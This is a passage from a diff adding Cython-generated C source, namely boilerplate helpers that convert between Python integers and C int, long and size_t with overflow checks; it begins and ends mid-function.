(unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(int) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(int) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(int) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(int), + little, !is_unsigned); + } +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* CIntFromPy */ + static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const size_t neg_one = (size_t) -1, const_zero = (size_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(size_t) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(size_t, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (size_t) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 2 * PyLong_SHIFT)) { + return (size_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 3 * PyLong_SHIFT)) { + return (size_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 4 * PyLong_SHIFT)) { + return (size_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(size_t) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(size_t) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) ((((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) ((((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) ((((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(size_t) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + size_t val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (size_t) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (size_t) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (size_t) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (size_t) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(size_t) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(size_t) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((size_t) 1) << (sizeof(size_t) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (size_t) -1; + } + } else { + size_t val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (size_t) -1; + val = __Pyx_PyInt_As_size_t(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to size_t"); + return (size_t) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to size_t"); + return (size_t) -1; +} + +/* CIntFromPy */ + static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned 